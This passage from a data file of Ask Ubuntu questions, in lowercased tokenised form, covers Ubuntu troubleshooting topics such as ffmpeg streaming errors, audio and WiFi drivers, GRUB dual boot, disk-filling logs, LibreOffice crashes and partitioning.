`` seems '' to be ? edit 3 : i recompiled using my switches from my working ubuntu 11 system : ./configure -- enable-gpl -- enable-libass -- enable-libfaac -- enable-libfdk-aac -- enable-libmp3lame -- enable-libopencore-amrnb -- enable-libopencore-amrwb -- enable-librtmp -- enable-libtheora -- enable-libvorbis -- enable-libvpx -- enable-x11grab -- enable-libx264 -- enable-nonfree -- enable-version3 -- enable-shared -- enable-libv4l2 -- enable-avfilter -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-pthreads -- enable-zlib -- disable-stripping -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-libdc1394 -- disable-static the -- enable-shared is supposed to be yuvj subsets . so that 's done and all switches , now i run it and get : [ video4linux2 , v4l2 @ 0x9d1d0e0 ] estimating duration from bitrate , this may be inaccurate input # 0 , video4linux2 , v4l2 , from '/dev/video0 ' : duration : n/a , start : 36365.493926 , bitrate : 36863 kb/s stream # 0:0 : video : rawvideo ( i420 / 0x30323449 ) , yuv420p , 640x480 , 36863 kb/s , 10 tbr , 1000k tbn , 10 tbc incompatible pixel format ' ( null ) ' for codec 'flv ' , auto-selecting format ' ( null ) ' last message repeated 1 times [ flv @ 0x9d22440 ] warning min_rate > 0 but min_rate ! = max_rate is n't recommended ! [ flv @ 0x9d22440 ] bitrate below min bitrate output # 0 , ffm , to 'http : //ip:8090/cam1.ffm ' : metadata : creation_time : now stream # 0:0 : video : flv1 ( [ 0 ] [ 0 ] [ 0 ] [ 5 ] / 0x5000000 ) , yuv420p , 640x10 , q=255-255 , 200 kb/s , 1000k tbn , 10 tbc stream mapping : stream # 0:0 - > # 0:0 ( rawvideo - > flv ) error while opening encoder for output stream # 0:0 - maybe incorrect parameters such as bit_rate , rate , width or height so now it runs and finds things but still wo n't let me because of bitrate below min bitrate . i have tried setting -b 200k and -b 600k but still same thing . i figure it 's because the ffm file states 200 , but i want it at 200 . so now how do i disable bitrate checking ? i guess that 's the problem now , to be honest i 'm tempted to install ubuntu 11.04 on this system and scratch it , each new version of software makes things harder and harder .
234960	what is the correct way to use the `` scroll-event '' signal ( on an indicator ) for qt ?	i am again at the same position , when i had the question what is the correct way to use g_signal_connect ( ) in c++ for dynamic unity quicklists ? there i was informed that the signature for my static method was incorrect and that i had to add a guint argument in front of the others . now i have the same problem but for the function called for the `` scroll-event '' signal that i want to make on to my indicator . more specifically : //connecting indicator with the scroll-event and altogether with the function indicator_scrolled g_signal_connect ( g_object ( appindicator ) , `` scroll-event '' , g_callback ( & indicator_scrolled ) , ( gpointer ) this ) ; this is the function indicator_scrolled : gboolean indicator_scrolled ( gtkstatusicon *status_icon , gdkeventscroll *event , gpointer data ) { cout < < `` the indicator was scrolled\n '' ; mainwindow* m = ( mainwindow* ) data ; m- > action_on_scroll ( ) ; } i can see the `` indicator was scrolled '' message but then the program crashed . adding a guint argument in front of the others did n't solved the problem . so , what is the correct signature for this function so as to make it work ? how can i find what is the correct signature each time so as to avoid this kind of questions ? ( at the other question user george edison talked about valgrind but he did not clarify ) please do not advice that appindicators are not the correct way to go with ubuntu+qt , please see question make sniqt recognize all tray abilities ( or create a working indicator in qt ) edit : after tests i coincidentally found that a guint argument needs to be placed between the gtkstatusicon and gdkeventscroll arguments . but i would really want to know a way to find out what is the correct function signature .
234961	choppy audio on realtek alc888s	the onboard realtek alc888s is giving out choppy audio oddly , speech comes out fine but is at a low volume alsamixer detects it as being realtek alc1200 instead of realtek alc888s and lspci : amith @ amith-desktop : ~ $ lspci|grep audio 00:09.0 audio device : nvidia corporation mcp73 high definition audio ( rev a1 ) the motherboard is a hp napa gl8 g31 with a core 2 duo
234968	how to show mount icons on the desktop , in gnome classic ?	in the pre-unity days , when a device was ( auto ) mounted , a icon used to show on the desktop . currently , i have ubuntu 12.10 in classic mode - is there a way to get the same behavior ?
234971	java problem in configuration	hi friends , in this image java is installed on my computer and when i use the `` java -version `` shows me the message diplayed in the image . but , when i use javac -version this show me error `` not found `` why is this so and how to properly set java on my computer so as to use this for my programming compiling and executing java files . thanks in advance ! ! i installed openjdk as well :
234973	how to figure out if a window is actually displayed on the screen using shell script ?	i 'm trying to write a shell script that recognizes if thunderbird window is displayed and if so it disposes it to the messages tray . i 'd like to use it in this answer of `` how to keep thunderbird and pidgin running on background ? '' question . so far i 'm using the `` xdotool '' to check if thunderbird is displayed and simulate close on it as suggested in `` how to emulate pressing the close button from a script ? '' . # ! bin/bash thunderbird & tb= $ ( xdotool search -- class thunderbird ) while [ -z `` $ tb '' ] ; do sleep 2 tb= $ ( xdotool search -- class thunderbird ) done xdotool search -- class thunderbird windowunmap % @ but xdotool search -- class thunderbird returns result by the time thunderbird is launched , before is actually displayed , so xdotool search -- class thunderbird windowunmap % @ waits for ever doing nothing . to bypass this limitation a sleep xx is added in the actual command , but the sleep time needed , defers from system to system . i 've also used `` xwininfo '' to check if thunderbird is displayed but it behaves the same as `` xdotool '' , so i had to add sleep xx here too . # ! bin/bash thunderbird & t= '' thunderbird '' stop=0 xwininfo -name $ t > /dev/null 2 > & 1 if [ $ ? -eq 0 ] ; then stop=1 fi while [ $ stop -eq 0 ] ; do xwininfo -name $ t > /dev/null 2 > & 1 if [ $ ? -eq 0 ] ; then stop=1 fi done sleep 2 xdotool search -- class thunderbird windowunmap % @ is there any other way to check for `` really '' displayed windows ?
234978	booting from wrong hd . new ubuntu and grub install with dual boot with windows xp	i have x2 hd 's , hd 1 with partitions for win xp and ubuntu and an additional 2 partitions . i installed win xp , followed by ubuntu ( from cd ) onto hd 1 . i can boot up ( into either ubuntu or winxp ) but only if in bios i change the boot priority to hd 2 then hd 1 , which is the opposite to how i normally have it set up ( i.e . boot priority was previously set to hd 1 then hd 2 ) i am assuming that this is due to during install of ubuntu/grub , i seem to have installed the ubuntu/grub boot loader to hd 2 ... ? is there a way i can move/change this so that is set up so that i can have it all on hd 1 , and therefoe can have my boot priority set to hd 1 then hd 2 ? thanks in advance .
234979	ubuntu 12.04 libreoffice crashing when typing malayalam in ibus	libreoffice keeps crashing when typing malayalam inscript with ibus . especially when i press the keys `` a '' and `` x '' one by one . below the terminal output when i open the libreoffice writer via terminal . sree @ ubuntucafe : ~ $ lowriter *** glibc detected *** /usr/lib/libreoffice/program/soffice.bin : free ( ) : invalid next size ( fast ) : 0x0a205cd8 *** ======= backtrace : ========= /lib/i386-linux-gnu/libc.so.6 ( +0x73e42 ) [ 0xb74cce42 ] /usr/lib/libicuuc.so.48 ( uprv_free_48+0x48 ) [ 0xb5708cd8 ] /usr/lib/libicule.so.48 ( _zn6icu_4814leglyphstorage5resetev+0x82 ) [ 0xb554b042 ] /usr/lib/libicule.so.48 ( _zn6icu_4812layoutengine5resetev+0x1e ) [ 0xb553eb8e ] /usr/lib/libicule.so.48 ( _zn6icu_4820opentypelayoutengine5resetev+0x1b ) [ 0xb553bf2b ] /usr/lib/libreoffice/program/libvcllo.so ( +0x386fc2 ) [ 0xb619ffc2 ] /usr/lib/libreoffice/program/libvcllo.so ( _zn16serverfontlayout10layouttexter14impllayoutargs+0x4c ) [ 0xb61a0b5c ] /usr/lib/libreoffice/program/libvcllo.so ( +0x1d4e21 ) [ 0xb5fede21 ] /usr/lib/libreoffice/program/libvcllo.so ( _znk12outputdevice12gettextarrayerk6stringpltt+0xb6 ) [ 0xb5fee956 ] /usr/lib/libreoffice/program/libvcllo.so ( _znk12outputdevice12gettextwidtherk6stringtt+0x3d ) [ 0xb5feeaad ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x4ec6de ) [ 0xab8316de ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x503e8d ) [ 0xab848e8d ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x483bd6 ) [ 0xab7c8bd6 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x48142a ) [ 0xab7c642a ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x4b46fe ) [ 0xab7f96fe ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x495d35 ) [ 0xab7dad35 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x497287 ) [ 0xab7dc287 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x477e57 ) [ 0xab7bce57 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x47a51e ) [ 0xab7bf51e ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x47b24b ) [ 0xab7c024b ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x47bb23 ) [ 0xab7c0b23 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x3b73d8 ) [ 0xab6fc3d8 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x3b4589 ) [ 0xab6f9589 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x3e6363 ) [ 0xab72b363 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x3e65c4 ) [ 0xab72b5c4 ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x3e9cf8 ) [ 0xab72ecf8 ] /usr/lib/libreoffice/program/../program/libswlo.so ( _zn9viewshell13implendactioneh+0x55b ) [ 0xab9c74db ] /usr/lib/libreoffice/program/../program/libswlo.so ( _zn11swcrsrshell9endactioneh+0x28b ) [ 0xab53ad3b ] /usr/lib/libreoffice/program/../program/libswlo.so ( _zn11sweditshell12endallactionev+0x5f ) [ 0xab690e1f ] /usr/lib/libreoffice/program/../program/libswlo.so ( _zn11sweditshell19setexttextinputdataerk23commandexttextinputdata+0x11d ) [ 0xab67d4ad ] /usr/lib/libreoffice/program/../program/libswlo.so ( +0x837483 ) [ 0xabb7c483 ] /usr/lib/libreoffice/program/libvcllo.so ( +0x34ef01 ) [ 0xb6167f01 ] /usr/lib/libreoffice/program/libvcllo.so ( +0x352e39 ) [ 0xb616be39 ] /usr/lib/libreoffice/program/libvclplug_gtklo.so ( +0x444ac ) [ 0xb25694ac ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_cclosure_marshal_void__stringv+0x63 ) [ 0xb1f850a3 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( +0xd727 ) [ 0xb1f82727 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit_valist+0x449 ) [ 0xb1f9ba29 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit_by_name+0x44f ) [ 0xb1f9c8af ] /usr/lib/i386-linux-gnu/libgtk-x11-2.0.so.0 ( +0x11d6dd ) [ 0xb21da6dd ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_cclosure_marshal_void__stringv+0x63 ) [ 0xb1f850a3 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( +0xd727 ) [ 0xb1f82727 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit_valist+0x449 ) [ 0xb1f9ba29 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit+0x33 ) [ 0xb1f9c453 ] /usr/lib/i386-linux-gnu/gtk-2.0/2.10.0/immodules/im-ibus.so ( +0x309f ) [ 0xae63209f ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_cclosure_marshal_void__objectv+0x60 ) [ 0xb1f85690 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( +0xd727 ) [ 0xb1f82727 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit_valist+0x449 ) [ 0xb1f9ba29 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit+0x33 ) [ 0xb1f9c453 ] /usr/lib/i386-linux-gnu/libibus-1.0.so.0 ( +0x1655c ) [ 0xae5e455c ] /usr/lib/i386-linux-gnu/libffi.so.6 ( ffi_call_sysv+0x1a ) [ 0xb1c2735a ] /usr/lib/i386-linux-gnu/libffi.so.6 ( ffi_call+0x6f ) [ 0xb1c2708f ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_cclosure_marshal_generic+0x1c4 ) [ 0xb1f82d94 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( +0xc2fd ) [ 0xb1f812fd ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_closure_invoke+0x184 ) [ 0xb1f82484 ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( +0x1f70d ) [ 0xb1f9470d ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit_valist+0xcfc ) [ 0xb1f9c2dc ] /usr/lib/i386-linux-gnu/libgobject-2.0.so.0 ( g_signal_emit+0x33 ) [ 0xb1f9c453 ] /usr/lib/i386-linux-gnu/libgio-2.0.so.0 ( +0xcb407 ) [ 0xb1d63407 ] /usr/lib/i386-linux-gnu/libgio-2.0.so.0 ( +0xb92f6 ) [ 0xb1d512f6 ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( +0x44740 ) [ 0xb1ec0740 ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( g_main_context_dispatch+0x17a ) [ 0xb1ec2cda ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( +0x470e5 ) [ 0xb1ec30e5 ] /lib/i386-linux-gnu/libglib-2.0.so.0 ( g_main_context_iteration+0x41 ) [ 0xb1ec31c1 ] ======= memory map : ======== 08048000-08049000 r-xp 00000000 08:07 201758 /usr/lib/libreoffice/program/soffice.bin 08049000-0804a000 r -- p 00000000 08:07 201758 /usr/lib/libreoffice/program/soffice.bin 0804a000-0804b000 rw-p 00001000 08:07 201758 /usr/lib/libreoffice/program/soffice.bin 093d8000-0a23c000 rw-p 00000000 00:00 0 [ heap ] aa67d000-aa7e4000 r -- s 00000000 08:07 9026 /usr/share/fonts/truetype/freefont/freeserif.ttf aa7e4000-aa873000 r -- s 00000000 08:07 9022 /usr/share/fonts/truetype/freefont/freesans.ttf aa873000-aa87a000 r-xp 00000000 08:07 201890 /usr/lib/libreoffice/program/libmcnttype.so aa87a000-aa87b000 r -- p 00006000 08:07 201890 /usr/lib/libreoffice/program/libmcnttype.so aa87b000-aa87c000 rw-p 00007000 08:07 201890 /usr/lib/libreoffice/program/libmcnttype.so aa87c000-aa87d000 -- -p 00000000 00:00 0 aa87d000-ab08d000 rw-p 00000000 00:00 0 ab08d000-ab0a9000 r-xp 00000000 08:07 201655 /usr/lib/ure/lib/introspection.uno.so ab0a9000-ab0aa000 -- -p 0001c000 08:07 201655 /usr/lib/ure/lib/introspection.uno.so ab0aa000-ab0ab000 r -- p 0001c000 08:07 201655 /usr/lib/ure/lib/introspection.uno.so ab0ab000-ab0ac000 rw-p 0001d000 08:07 201655 /usr/lib/ure/lib/introspection.uno.so ab0ac000-ab118000 r-xp 00000000 08:07 201912 /usr/lib/libreoffice/program/libunoxmllo.so ab118000-ab120000 r -- p 0006b000 08:07 201912 /usr/lib/libreoffice/program/libunoxmllo.so ab120000-ab121000 rw-p 00073000 08:07 201912 /usr/lib/libreoffice/program/libunoxmllo.so ab121000-ab139000 r-xp 00000000 08:07 201819 /usr/lib/libreoffice/program/libhelplinkerlo.so ab139000-ab13a000 r -- p 00017000 08:07 201819 /usr/lib/libreoffice/program/libhelplinkerlo.so ab13a000-ab13b000 rw-p 00018000 08:07 201819 /usr/lib/libreoffice/program/libhelplinkerlo.so ab13b000-ab1e6000 r-xp 00000000 08:07 201862 /usr/lib/libreoffice/program/libdeployment.so ab1e6000-ab1ec000 r -- p 000ab000 08:07 201862 /usr/lib/libreoffice/program/libdeployment.so ab1ec000-ab1ed000 rw-p 000b1000 08:07 201862 /usr/lib/libreoffice/program/libdeployment.so kernel version sree @ ubuntucafe : ~ $ uname -r 3.2.0-23-generic-pae
234980	why my live installation results blank screen ?	trying to boot into the 12.10 live installation from a usb stick on asus zenbook prime ux32vd . after grub it just shows a blank screen . it 's an uefi system , so from the boot manager i picked uefi : usb disk pmap and as advised in here , changed the splash parameter to nomodeset . so the parameters are : setparams 'try ubuntu without installing' set gfxpayload=keep linux /casper/vmlinuz.efi.signed file=/cdrom/preseed/ubuntu.seed boot=casper quiet nomodeset -- initrd /casper/initrd.lz i 've already tried re-creating the usb stick , removing the quiet parameter and not changing the splash parameter , but neither of those made a difference .
234982	what is the policy on backporting paper cuts fixes ?	i 've just reported a paper cut in the current lts release and was wondering if i will ever see the fix backported , or if i 'm going to have to upgrade so get it .
234984	ubuntu 12.04 installed but wo n't boot , no other os	os ubuntu 12.04 installed from usb computer toshiba satellite old os : vista hello , i installed ubuntu 12.04 from a usb . during the installation i installed ubuntu over windows so all windows was deleted . after installation was complete it asked for a re-boot and i re-booted . it went to a screen with a flashing cursor in the top right corner . i then re-booted the comp . from usb and it takes me to a page that has at the top gnu grub version 1.99-2ubuntu3.1 further below i have options to choose . ubuntu with linux 3.2.0-29-generic-pae ubuntu with linux 3.2.0-29-generic-pae ( recovery mode ) memtest86+ memtest86+ serial console 115200 after i choose the first two optionsit goes back to the following screen mountall : error while loading shared libraries ; /lib/libply.so.2 : invalid elf i am not sure what to do here . any help would be appreciated .
234989	server logs are filling my hard disk , how do i fix this ?	i have ubuntu 12.04 which serves my web application ( 20 mb ) on apache httpd . here is my partitions table : $ sudo parted -l disk /dev/sda : 500gb partition table : gpt number|start|end|size|file system|name|flag 1|17.4k|20.0mb|20.0mb|fat16| |boot 2|20.0mb|489gb|489gb|ext4 3|489gb|500gb|10.6gb|linux-swap ( v1 ) a few days ago i upgrade it to 12.10 . then copied one folder ( 30 gb ) to www folder . suddenly the server hang and i got a low graphics mode message . i removed the huge folder and restarted the computer but still got the same message and no space left on device $ sudo du -h /var -- max-depth=1 4.0k /var/tmp 235m /var/www 444g /var/log so , the /var/log is huge . i tried : $ sudo apt-get autoclean ; sudo apt-get autoremove **error ! no space left on device** i did delete the archives logs but nothing changes the largest file is /var/log/cups and when i list its files , i got : -rw-r -- -- - 1 root adm 758 dec 30 07:37 access_log.1.gz .. **-rw-r -- -- - 1 root adm 444g jan 5 08:09 error_log** -rw-r -- -- - 1 root adm 245 dec 29 13:17 error_log.1.gz i tried : $ sudo service cups stop sudo : unable to write to /var/lib/sudo/username/tty2 : no space left on device when i unplugged the computer then replugged it . it works fine and problem gone . the /var size is completely normal . i 'm afraid of facing it again . i think my main problem is because of the partitions . the /home and /root are together and not separated . do i have to create a new partition for /home ? anyone has another idea how to avoid the disk from filling up again ?
234990	versions newer than the ones in current ubuntu - where to find them ?	for example , the opencv package ( because i 'm waiting for that to compile as i write that : ) ) ubuntu has an opencv 2.3.1 package while the latest is 2.4.3 . suppose i 'd like to skip compiling from source which can take some time . so what i 'm wondering is , is there any ( well-known/reliable ) third-party site that provides unofficial debs with newer software versions than what 's available in the official ubuntu repos ? cause if not , that just means i 'm going to be having those annoying compile sessions more often than i like : )
234992	how to run a perl command ?	if i am running the following command to replace a string dst_ with dst_addr_ in multiple files . perl -pi -w -e ’s/dst_/dst_addr_/g ; ’ *.tcl it shows the following error : unrecognized character \xe2 ; marked by < -- here after < -- here near column 1 at -e line 1 . ’ : command not found what am i doing wrong ?
235002	unetbootin usb persistence for ubuntu 12.10 does n't work	i created a bootable usb stick for ubuntu 12.10 using unetbootin and set the persistent file size to 3072mb . i am able to boot into ubuntu 12.10 just fine . however , any changes i make are lost on reboot .
235005	how to backup gmail in precise	any reasonable way of backing up gmail ( imap ) using precise ? btw i 've tried backup-gmail but it 's unstable .
235006	brasero/k3b say : `` no disc present '' . how to burn on my blank dvd ?	i have a gateway e-4100 desktop computer with ubuntu 12.04 installed . i 'm trying to burn files to a blank dvd using the internal dvd/cd burner ( of which i 'm sure is the original that came with the pc ) . i would expect ubuntu to pop up a message whenever i insert a blank dvd in the drive , as that happens with blank cds . read-only or non-blank dvds are working properly , however , for my blank dvd it seems that the drive or ubuntu does n't recognize it . burning applications brasero and k3b report as if there 's no disc present . dmesg output for my cd/dvd drive : [ 2.528310 ] ata2.00 : atapi : hl-dt-stdvd-rom gdr8161b , 0040 , max udma/66 [ 2.528319 ] ata2.01 : atapi : hl-dt-st dvdram gma-4020b , a105 , max udma/66 [ 2.569345 ] scsi 1:0:0:0 : cd-rom hl-dt-st dvd-rom gdr8161b 0040 pq : 0 ansi : 5 [ 2.580569 ] cdrom : uniform cd-rom driver revision : 3.20 [ 2.580785 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 2.586841 ] scsi 1:0:1:0 : cd-rom hl-dt-st dvdram gma-4020b a105 pq : 0 ansi : 5 [ 2.592719 ] sr 1:0:1:0 : attached scsi cd-rom sr1 how can i burn to this dvd in ubuntu ?
235008	unable to install simon	i 'm trying to install simon using these commands : sudo add-apt-repository ppa : grasch-simon-listens/simon sudo apt-get update sudo apt-get install simon but i 'm getting this error : the following packages have unmet dependencies : simon : depends : libattica0 but it is not installable how can i install required dependencies .
235010	how to reset the repositories ?	the traceback i 'm getting makes me believe i have to reset all my repositories on my ubuntu 12.04 installation . how do i do that ? traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 183 , in < module > if not sp.add_source_from_line ( line ) : file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 718 , in add_source_from_line self.set_modified_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 471 , in set_modified_sourceslist self.save_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 635 , in save_sourceslist self.sourceslist.save ( ) file `` /usr/lib/python2.7/dist-packages/aptsources/sourceslist.py '' , line 396 , in save files [ source.file ] = open ( source.file , `` w '' ) ioerror : [ errno 2 ] no such file or directory : '/etc/apt/sources.list.d//noobslab-themes-precise.list'
235013	what driver do i needin order to install epson xp202 all in one printer ?	what driver do i need to install epson xp202 all in one printer ? would it be easier to change my printer and buy hp ?
235014	i am unable to enable wireless networks . how can i enable it ?	i have ubuntu 12.10 installed on an hp pavillion dv5 laptop i ca n't enable wireless networks . i am able to connect to wired networks though . i have a wireless button that 's currently set on disabled , and when i try to enable it through the button , nothing happens ! what do i need to do to enable my wireless network ? from lspci | grep 802 , i got nothing . from lspci , i got the following relevant output : 08:00.0 network controller : atheros communications inc. ar928x wireless network adapter ( pci-express ) ( rev 01 ) 09:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) from software sources , it does n't show any additional drivers . from here , i use atheros ar928x but i do n't know where to put the blacklist stuff into .
235018	xfce4-panel clock is slow to update after resume from suspend	on xubuntu 12.10 , when i resume from suspend , the clock displays the time when the suspend occurred , and it takes about 30 seconds for the clock to update to the correct time . then the clock works fine after that . does anyone know how to make the clock update quicker ?
235020	ubuntu 12.04.1 ( 64bit ) only recognizes 7.8gb of ram from 8gb ram	i know that is a little diference between 7.8gb to 8gb , but still a diference , why ubuntu dont recognizes all of my ram ? i had the same case with my 32 bit pc , 3gb ram and ubuntu only recognized 2.98gb , again , it is a little direfence but i wish to know why that happens .
235022	getting rid of windows	im new to ubuntu . iv downloaded it . i have saved all important windows files . i now want to get rid of windows . if tryed downloadsing the os-un installer but can see the button or link to down load . or afterwards get to the command line to look for the file ? lol help
235031	best way to configure poweroff keyboard shortcut	what 's the best/right way to configure gnome/unity so that hitting alt + f4 will power off the system when no more windows are open ? ( pop up the power-off dialog ) . ( running ubuntu 12.04.1 )
235033	where are the emblems coming from on the default folders ?	on a fresh ubuntu , you usually have these default ( empty ) folders : downloads documents music videos ... all with special emblems . but , where are these emblems coming from ? , what 's telling nautilus to display these emblems ? now that nautilus has dropped emblems support , i am unable to inspect or change these emblems via gui . just being curious here ... update as i posted as comment to uri 's answer : everyone here , is right : i was confusing emblems with folder-specific icons in this case . but : let me rephrase my question : why does , for example , nautilus know that it has to apply a special icon for these directories ? is there some flag on the actual dir , a metadata field in gvfs or is this hard-coded into nautilus ? ( running ubuntu 12.04.1 )
235040	recovery after installing ubuntu	i know this question has been asked many times and even i have asked it once ... but as today i came to know about fdisk so thought of posting it so that someone having good knowledge can help me better . here is the log created by fdisk and i would like ubunto to show me sda3 and sda4 which its not showing right now and even my windows 7 is not booting up.i have all of my data in one of them and really need it . thanks disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x3aa63aa5 device boot start end blocks id system /dev/sda1 63 2047 992+ 42 sfs /dev/sda2 * 2048 206847 102400 42 sfs /dev/sda3 206848 176334847 88064000 42 sfs /dev/sda4 466913278 488396799 10741761 5 extended /dev/sda5 486445056 488396799 975872 82 linux swap / solaris /dev/sda6 466913280 486445055 9765888 83 linux partition table entries are not in disk order disk /dev/sdb : 8075 mb , 8075120640 bytes 255 heads , 63 sectors/track , 981 cylinders , total 15771720 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system dev/sdb1 * 2048 15771647 7884800 b w95 fat32
235047	how can i extract my files from a corrupted vdi file ?	i was using virtualbox on my precedent mac , but the hard disk crashed , so i managed to retrieve some files , especially my .vdi file where i had all the data of my ubuntu host . i am using a new hard disk , but when i try to install ubuntu with my new vb and with my old .vdi file , i alm told that the .vdi file is partially damaged . how can i open my .vdi file and retrieve the files that are not corrupted ?
235049	my mac mini ( late 2012 ) will not show any wireless networks . ubuntu 12.10	i am fairly new to ubuntu so a step by step answer would be appreciated . my wireless card is broadcom bcm4331 . thank you . i also have no way to connect to the internet on it except my original osx partion . so a solution that works offline is required . my mac mini is a 6,1 model .
235059	quickly ~ web application fails to opendatabase	i 'm building a quickly ~ html5 application , it works great until i try to use websql storage , which fails to open a databse : var db = opendatabase ( 'mydb ' , '1.0 ' , 'test db ' , 5 * 1024 * 1024 ) ; giving the next error : error : security_err : dom exception 18 the python code that calls the webview is this : self.webview = webkit.webview ( ) self.scroller.add ( self.webview ) self.webview.props.settings.enable_default_context_menu = false self.webviewsettings = self.webview.get_settings ( ) self.webviewsettings.set_property ( `` javascript-can-open-windows-automatically '' , true ) self.webviewsettings.set_property ( `` enable-universal-access-from-file-uris '' , true ) self.webviewsettings.set_property ( `` enable-developer-extras '' , true ) self.webviewsettings.set_property ( `` enable-html5-database '' , true ) self.webviewsettings.set_property ( `` enable-html5-local-storage '' , true ) self.webviewsettings.set_property ( `` enable-offline-web-application-cache '' , true ) self.webviewsettings.set_property ( 'enable-file-access-from-file-uris ' , 1 ) self.webview.load_uri ( get_media_file ( 'app/index.html ' ) ) inspector = inspector ( self.webview.get_inspector ( ) ) self.webview.show ( ) what i 'm i doing wrong ? any help will be apreciated ( :
235065	why am i unable to connect to wifi network ? password is reported to be incorrect	i just installed lubuntu 12.10 . here are the specifications of my laptop : lenovo thinkpad t60 ( 2006 ) 1.66 ghz intel centrino duo processor 2 gb ddr2-667 ram 120 gb hard drive ( windows 8 pro , and lubuntu 12.10 ) mobile intel 945 express video ( 256 mb ) intel pro/wireless 3945abg if i log into lubuntu , it gives me a notification that i am not connected to wireless networking ( typical ) . i go to the networking menu , and click on my wireless network . it then asks for the password to log into the network . i type it in , and tell it to log in , but then it says that the password is incorrect . it then asks me to type it in again , but that still fails . i am sure i am typing in the correct password for that network . if i close the box , after i try to connect , it says that i have insufficient privileges to modify the wireless settings . i do n't understand this , as i am the administrator of the system . this is really bugging me , and i hope that there is a fix to this . please help !
235070	is running cinnamon on lubuntu a good idea ?	i dont really want to use linux mint 14 cinnamon , but i love the interface . is it a good idea to stick to ubuntu and run cinnamon on it ? does it work 100 % fine ? another thing : is it a good idea to put cinnamon interface on top of lubuntu ? is it still going to be a fast , reliable system ? thanks a lot and sorry for the newbie question .
235080	gparted partition editor not working	i had windows and installed ubuntu 12.10 alongside windows . i want to allocate suitable disk space to ubuntu . i installed the gparted parition editor from the software center . my problem is : it closes down as soon as i open it.the same happens when i try to open it through terminal . this is the message i get in the terminal : ( process:2977 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . ====================== libparted : 2.3 ====================== ( gpartedbin:2977 ) : glibmm-error ** : unhandled exception ( type std : :exception ) in signal handler : what : locale : :facet : :_s_create_c_locale name not valid trace/breakpoint trap ( core dumped ) this is the result of sudo fdisk -l : disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x7434793e device boot start end blocks id system /dev/sda1 63 80324 40131 de dell utility partition 1 does not start on physical sector boundary . /dev/sda2 * 81920 29044735 14481408 7 hpfs/ntfs/exfat /dev/sda3 29044736 606384127 288669696 7 hpfs/ntfs/exfat /dev/sda4 606386176 1953521663 673567744 f w95 ext 'd ( lba ) /dev/sda5 606388224 817569791 105590784 7 hpfs/ntfs/exfat /dev/sda6 817571840 1543921663 363174912 7 hpfs/ntfs/exfat /dev/sda7 1543923712 1748721663 102398976 7 hpfs/ntfs/exfat /dev/sda8 1748723712 1953521663 102398976 7 hpfs/ntfs/exfat sudo parted -l : model : ata wdc wd10jpvt-75a ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 32.3kb 41.1mb 41.1mb primary fat16 diag 2 41.9mb 14.9gb 14.8gb primary ntfs boot 3 14.9gb 310gb 296gb primary ntfs 4 310gb 1000gb 690gb extended lba 5 310gb 419gb 108gb logical ntfs 